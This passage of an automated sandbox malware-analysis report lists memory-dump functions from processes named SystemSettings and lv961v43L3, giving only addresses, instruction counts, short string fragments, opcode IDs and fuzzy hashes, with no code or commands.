                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0382474be2252812ffddbfc94a16e0f37ee67439e0a9c7c8d7487183ef8c9765
                                                                  • Instruction ID: 94d08d2a8110e923dbf233342143cb77bacfc293ab0e6e987a3c2764f880ea2b
                                                                  • Opcode Fuzzy Hash: 0382474be2252812ffddbfc94a16e0f37ee67439e0a9c7c8d7487183ef8c9765
                                                                  • Instruction Fuzzy Hash: CFD01234B689044FC70CBB3988598747391EB6A216B9551A9D00BD72B2DA6ADC89C741
                                                                  Function 00007FF848F66F70 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f61000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cafd7b5e3ac81762a707ba99b176ee0fab41c2c9d3fb29d38313d5a8f2fc29b3
                                                                  • Instruction ID: a9a630785914d46d9edd85a00b8a0ba6d437fd629e332af715c297eacf8e3ba9
                                                                  • Opcode Fuzzy Hash: cafd7b5e3ac81762a707ba99b176ee0fab41c2c9d3fb29d38313d5a8f2fc29b3
                                                                  • Instruction Fuzzy Hash: 51D01234B64D044FC70CB73CC85987473D1EB6A216B9552A9D00AD72B1DA6ADC8AC741
                                                                  Function 00007FF848F44244 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f40000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0774509350fcb16a96952fee60087b600d5d074e6190a9b8aa3e1f730324e430
                                                                  • Instruction ID: a5d55fb57aaacc7a7a963b7969240e80852061955f8525134489496fa3c26dcb
                                                                  • Opcode Fuzzy Hash: 0774509350fcb16a96952fee60087b600d5d074e6190a9b8aa3e1f730324e430
                                                                  • Instruction Fuzzy Hash: 2FD017B0D0E61EAEEB41AB64C0162BEBEB0EF50384F500076D109A22D3DF3C29458B98
                                                                  Function 00007FF848F306A5 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction ID: 326b8de8d886ff496f5c18850a3a278a94aa64266d6fa89b44eb625044fa786c
                                                                  • Opcode Fuzzy Hash: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction Fuzzy Hash: E2C08C20D1F80F0AF400B32E14020ACA1009BC4390FD00073C80C401C5AE0D21C5018E
                                                                  Function 00007FF848F312B0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction ID: 080bbe0f0f5e2b719b9dbe9ead134434cdac85d167a41a6db6a7bd7504e0cd23
                                                                  • Opcode Fuzzy Hash: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction Fuzzy Hash: 85C04C34555C098FC948FB29C88591477A0FB19215BD60090E409CB1B1D659DCD5C745
                                                                  Function 00007FF848F30B18 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction ID: 2dd0114cb7b838ab2c4b38e2b092f044fa6d3efbaeafe2d5c2a324c08edb4883
                                                                  • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction Fuzzy Hash: 95C04C305158099FC954F72DC98595476A0FB4D215BD50190E40DCB2B1E75A9C95C745
                                                                  Function 00007FF848F35E65 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 117b690b7bafee8c19d2bf6994fe54ea3ebfbd24beead24df09bd8e874c5f04c
                                                                  • Instruction ID: 574ac18777d8d76e3adf1f63ee972223f8ebbcf4a7b5c32835506d1d35288392
                                                                  • Opcode Fuzzy Hash: 117b690b7bafee8c19d2bf6994fe54ea3ebfbd24beead24df09bd8e874c5f04c
                                                                  • Instruction Fuzzy Hash: CCC04C11E1BC2A96F266631550312BE48579F84748F946076F80E873CACF4D5F41429B
                                                                  Function 00007FF848F306C8 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000025.00000002.2270548243.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_37_2_7ff848f30000_SystemSettings.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction ID: 8622f6891dee52e5bb6be83a981e4ac7dfc8e75a6fca5afcec18121fca364e56
                                                                  • Opcode Fuzzy Hash: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction Fuzzy Hash: 97B00214C6F44F05E454337A195606574509B85254FD511B3D80D501C5994D15D5129A

                                                                  Executed Functions

                                                                  Function 00007FF848F30EF0 Relevance: 2.8, Strings: 1, Instructions: 1518COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f30000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 3<M_^
                                                                  • API String ID: 0-3665129970
                                                                  • Opcode ID: da2bc74bed7fd360d160de8b8b529803ad70aa6d201c605614fdace862ac5aee
                                                                  • Instruction ID: 05d7ea5ca3fe6158c0ade9155bb47d797622e1060a64fef1d3a6728d95b6ba87
                                                                  • Opcode Fuzzy Hash: da2bc74bed7fd360d160de8b8b529803ad70aa6d201c605614fdace862ac5aee
                                                                  • Instruction Fuzzy Hash: 41B28231E1C91A8FEB99FB2894516B973A2FF98741F1445B9D40DC32C7DE38AC828785
                                                                  Function 00007FF848F20D4C Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5Z_H
                                                                  • API String ID: 0-3267294416
                                                                  • Opcode ID: a9d7f577f450fe051fb190c5e64136924169a2f62588c124a90100a80acc11c4
                                                                  • Instruction ID: 0544daf02a8cae851d6f0dc8d1242dffebd06cc1c6f7f8d1501057ebb2298dbc
                                                                  • Opcode Fuzzy Hash: a9d7f577f450fe051fb190c5e64136924169a2f62588c124a90100a80acc11c4
                                                                  • Instruction Fuzzy Hash: C6910471D1CA998FE789EB2898653AABFE1FB9A350F0000BAC108D73D2CF791814C705
                                                                  Function 00007FF848F20B3F Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c9$!k9$"s9
                                                                  • API String ID: 0-3426396564
                                                                  • Opcode ID: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                                  • Instruction ID: ba731a2ff701c1ff3eb2f9f24a765302349bddb1563c4b93ddaa09ce362c202a
                                                                  • Opcode Fuzzy Hash: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                                  • Instruction Fuzzy Hash: A601493771D9664BD741773DFC905D8BB40EB9627679506BBD184C7192E241144AC3D0
                                                                  Function 00007FF848F53A9D Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @aH$M
                                                                  • API String ID: 0-2096102131
                                                                  • Opcode ID: 20857f1e60963e02c96c01cbb79a9c1241f3ce9a9f7e8cfe87da75110cfaef94
                                                                  • Instruction ID: d7cf8c2814e23e67ee28d9e62cf860bff124cf4653da96c250c9946b16b36673
                                                                  • Opcode Fuzzy Hash: 20857f1e60963e02c96c01cbb79a9c1241f3ce9a9f7e8cfe87da75110cfaef94
                                                                  • Instruction Fuzzy Hash: D2718C32E0C99A5FEA99BB2C8466275F3D1FF5A391F8445B9C40DC72C3DE2C68858345
                                                                  Function 00007FF848F52268 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: dc65db4ae4a1ab43ad1d0e4b6f33e3b9c2528860ab74486179f326f4ed30157d
                                                                  • Instruction ID: 5362d00ecaa7a5a969375e4eeb113dc4d743df5304e2f949abfcf4eb87716c56
                                                                  • Opcode Fuzzy Hash: dc65db4ae4a1ab43ad1d0e4b6f33e3b9c2528860ab74486179f326f4ed30157d
                                                                  • Instruction Fuzzy Hash: 35119D3184F3C14FEB07A7344868995BFA0AF53255B0D82EED095CF0E3DA6A484AC712
                                                                  Function 00007FF848F5A569 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: d0676e24e96bd385dc04f3fb5ab814f47850c6a6534832e8c14487367f2385e4
                                                                  • Instruction ID: 42a85964706cc06926d49ac6abc63d86f823d33bf9f4328828610c9088c79b8f
                                                                  • Opcode Fuzzy Hash: d0676e24e96bd385dc04f3fb5ab814f47850c6a6534832e8c14487367f2385e4
                                                                  • Instruction Fuzzy Hash: 7EE06571A0E7844FC719EA344459454BF60EF6720174941EEC045CF1A3EA2DC886C701
                                                                  Function 00007FF848F53609 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 3076cf459687321224178ac50af6658c038033d25900b3ffd36c31a4ba42240d
                                                                  • Instruction ID: 6d91390a3181b9bc3f26c66fe6aba2e6b33ba306a0782361312dd739a70a3054
                                                                  • Opcode Fuzzy Hash: 3076cf459687321224178ac50af6658c038033d25900b3ffd36c31a4ba42240d
                                                                  • Instruction Fuzzy Hash: 72F0307150E7C54FC75AEA388869455BF60EF6721174A52EFC045CF2A3EA298C85C711
                                                                  Function 00007FF848F52319 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 21bb7ab671a7c18f2c7a8db96f44953d26707d75b87d4a3031d260b0ed5fb832
                                                                  • Instruction ID: 8055a4b1226b5d9c3daa5f2e45af7098b1d492a8b02259d60570deff207d18ff
                                                                  • Opcode Fuzzy Hash: 21bb7ab671a7c18f2c7a8db96f44953d26707d75b87d4a3031d260b0ed5fb832
                                                                  • Instruction Fuzzy Hash: DDF0E57190E3C04FC706EB348868404BFA0EF2720174941EEC046CF2A3EA2D9C85C701
                                                                  Function 00007FF848F5A5F9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M
                                                                  • API String ID: 0-3664761504
                                                                  • Opcode ID: 4b7847441db77ca2348d303fb15cdd4d2da3a3e065ef733f179b8bfc3901390c
                                                                  • Instruction ID: e9621f717fe131509cc8430e1c96714fce06537ce22191bd59f9bebc65db5831
                                                                  • Opcode Fuzzy Hash: 4b7847441db77ca2348d303fb15cdd4d2da3a3e065ef733f179b8bfc3901390c
                                                                  • Instruction Fuzzy Hash: E0E06D71A0E7C44FC71AAA34886D454BFA0EF6721174A42EFC445CF1A7EA2D8889C701
                                                                  Function 00007FF848F5AB39 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 262d1adc32f85b937d2f1f6406f094318634670aa182e29e9c3f59b4cf3a075e
                                                                  • Instruction ID: bd75a72fad17517514f734abbf2b35e72d9d0a4896b9c5dd5ae4b2d6763618b2
                                                                  • Opcode Fuzzy Hash: 262d1adc32f85b937d2f1f6406f094318634670aa182e29e9c3f59b4cf3a075e
                                                                  • Instruction Fuzzy Hash: 97E01A7184E7C04FCB4AEB3488698547FA1EE67211B8A40EEC089CF1A3E62D984AC701
                                                                  Function 00007FF848F523A9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: 27abea763f53eb22132d75c5cd3980eea3118a4a08247f01ed7b6e96340a68e9
                                                                  • Instruction ID: 73f78f0a56d1e1224f643e2eea35d90c7713fa15fe595418693445892eee9213
                                                                  • Opcode Fuzzy Hash: 27abea763f53eb22132d75c5cd3980eea3118a4a08247f01ed7b6e96340a68e9
                                                                  • Instruction Fuzzy Hash: 86E0ED7144E7D08FC70AEB7488658547F60EE6721174A51DED045CF1B3E6299849C701
                                                                  Function 00007FF848F57E49 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: I
                                                                  • API String ID: 0-3707901625
                                                                  • Opcode ID: c7e515f9ba46f650a42dd5c45e5417130f345a45bf17762be80aa9faa3f7763d
                                                                  • Instruction ID: 9ba32f73f597d7e19eee2818d7e334769edfbeb585aa6b095c06ea1765b049d9
                                                                  • Opcode Fuzzy Hash: c7e515f9ba46f650a42dd5c45e5417130f345a45bf17762be80aa9faa3f7763d
                                                                  • Instruction Fuzzy Hash: E3E0ED7184E7C44FC746EB74886A849BFA0AE6721174A40EEC045CF1A3E62E8845C701
                                                                  Function 00007FF848F314FD Relevance: .4, Instructions: 445COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f30000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aeb5b18cf5a53d9699b37bf46c727f66942f150d7ff0ec64787f0dd6943fadb8
                                                                  • Instruction ID: df0743e2b3275e4771985cc8b790de547525f813d54c86732ab15522ecada1a3
                                                                  • Opcode Fuzzy Hash: aeb5b18cf5a53d9699b37bf46c727f66942f150d7ff0ec64787f0dd6943fadb8
                                                                  • Instruction Fuzzy Hash: 95E18131E1D91A9FEB99EB28945167973E1FF98740F1405BAD40EC32C7DE38AC828745
                                                                  Function 00007FF848F5AC7D Relevance: .2, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f7b9301278976547e388492b096db3207b8c12012c019158390cf612371a7979
                                                                  • Instruction ID: 187b07a740f12302504da75428b7b6a87f00cfa800851c84054b4b073e8221b2
                                                                  • Opcode Fuzzy Hash: f7b9301278976547e388492b096db3207b8c12012c019158390cf612371a7979
                                                                  • Instruction Fuzzy Hash: 8251AE32E0E95A4FE799B72984AA6B9B791FF98350F4401B9D00DC72C7DE2C6CD18385
                                                                  Function 00007FF848F59061 Relevance: .1, Instructions: 149COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9988192ac534244a0dde24b66317e97ecd699b1607d9057b3ffd8f7623b84097
                                                                  • Instruction ID: 2eac3dfbf197dd655b7426b3e33d9162bc538f0dbdf6b423ecd32b809ccb286e
                                                                  • Opcode Fuzzy Hash: 9988192ac534244a0dde24b66317e97ecd699b1607d9057b3ffd8f7623b84097
                                                                  • Instruction Fuzzy Hash: 9F410633A1E1529EE756BB7CB4450E97B60EF413A4F0846B6D08C8F497DF1C284987A9
                                                                  Function 00007FF848F53BEF Relevance: .1, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 219fad454ecb0a3eb6f37d0fa77bee4fa60eab72aa0f11667c8fccb39223c6c9
                                                                  • Instruction ID: b76279e3430f92e4ea5bf2407676ee6e6177a5c5843fba4f2b8d46436ea0df82
                                                                  • Opcode Fuzzy Hash: 219fad454ecb0a3eb6f37d0fa77bee4fa60eab72aa0f11667c8fccb39223c6c9
                                                                  • Instruction Fuzzy Hash: AD41B031A1C95A5FE688FB6C84662BAF3D2EF99390F44407AD40DC32C3DE2D68818785
                                                                  Function 00007FF848F53BC6 Relevance: .1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27bf94ac972a672a07429409d5bfbd285356f4b03968fec89d5d3b6c5188677e
                                                                  • Instruction ID: c32082e0ec7e836a2280c756f0e77e749d0a9d3a9a44aea806b9cc73b9483e71
                                                                  • Opcode Fuzzy Hash: 27bf94ac972a672a07429409d5bfbd285356f4b03968fec89d5d3b6c5188677e
                                                                  • Instruction Fuzzy Hash: EE41CE31A1C95A5FEA88FB6C84662B9F3D1EF5A780F840179D40DC72C7DE2C6C818385
                                                                  Function 00007FF848F208D0 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 49f77e4188f9a82273e18c7649d996e975077ba2636ef556632b1b140f378a20
                                                                  • Instruction ID: aed2a5ab916920c5163ca43c57c688e1fbab6ad70bda2fe127d19e9de5f8817b
                                                                  • Opcode Fuzzy Hash: 49f77e4188f9a82273e18c7649d996e975077ba2636ef556632b1b140f378a20
                                                                  • Instruction Fuzzy Hash: 10415622A1E9659EE344B37C70992FA7B90EF853A9F0805BBD14DCB1C7DE1C6841829C
                                                                  Function 00007FF848F20998 Relevance: .1, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4fe13b793129aa810b8bbf9a2a6380ea9476c4a73a0a6dabbc5f91c6da578fff
                                                                  • Instruction ID: 85cc1ccd5c6ff8358f81e97a596bb05baf327a0e3215349094cd020d7e387718
                                                                  • Opcode Fuzzy Hash: 4fe13b793129aa810b8bbf9a2a6380ea9476c4a73a0a6dabbc5f91c6da578fff
                                                                  • Instruction Fuzzy Hash: ED313831A1D9595FE788F72C645A6B937C1EF99391F5400B9E80DC33D3DE29AC408788
                                                                  Function 00007FF848F21171 Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: abd86a99b6cc55d221634ee7f43d2d362ff04e39d70cd6ce8234f59a0ba5d097
                                                                  • Instruction ID: 9d3be0becd2af45ca06beea906d9f9aaff0194d4789c7ed8f20f6ed73864fe36
                                                                  • Opcode Fuzzy Hash: abd86a99b6cc55d221634ee7f43d2d362ff04e39d70cd6ce8234f59a0ba5d097
                                                                  • Instruction Fuzzy Hash: CB31813190D68A8FDB46EB64C8599B97BF1FF5A300F0805FAC00AD72E3DB29A844C755
                                                                  Function 00007FF848F523E1 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f51000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2ce80c068cfead8df46708e19239020fa1a015ce723e985d96c189da3d595419
                                                                  • Instruction ID: 10de64ae695b55712355def43e5ea39250e9c5b0ef89d78136f62a53bee9e1a9
                                                                  • Opcode Fuzzy Hash: 2ce80c068cfead8df46708e19239020fa1a015ce723e985d96c189da3d595419
                                                                  • Instruction Fuzzy Hash: 7021D731A4D9964FE785F7A884A52B5A691EF69340F4402BAC50CC31C3DE3C18958355
                                                                  Function 00007FF848F20C25 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.2243551082.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff848f20000_lv961v43L3.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aaa8bd1cfe2e0bdff666cbc3427c7e9420ab5d84605c2d5524bdc31526d12188
                                                                  • Instruction ID: 6174cb0884876c5019886cc60f6b74a0c9246afcb37d0f91436a45ad226d670e
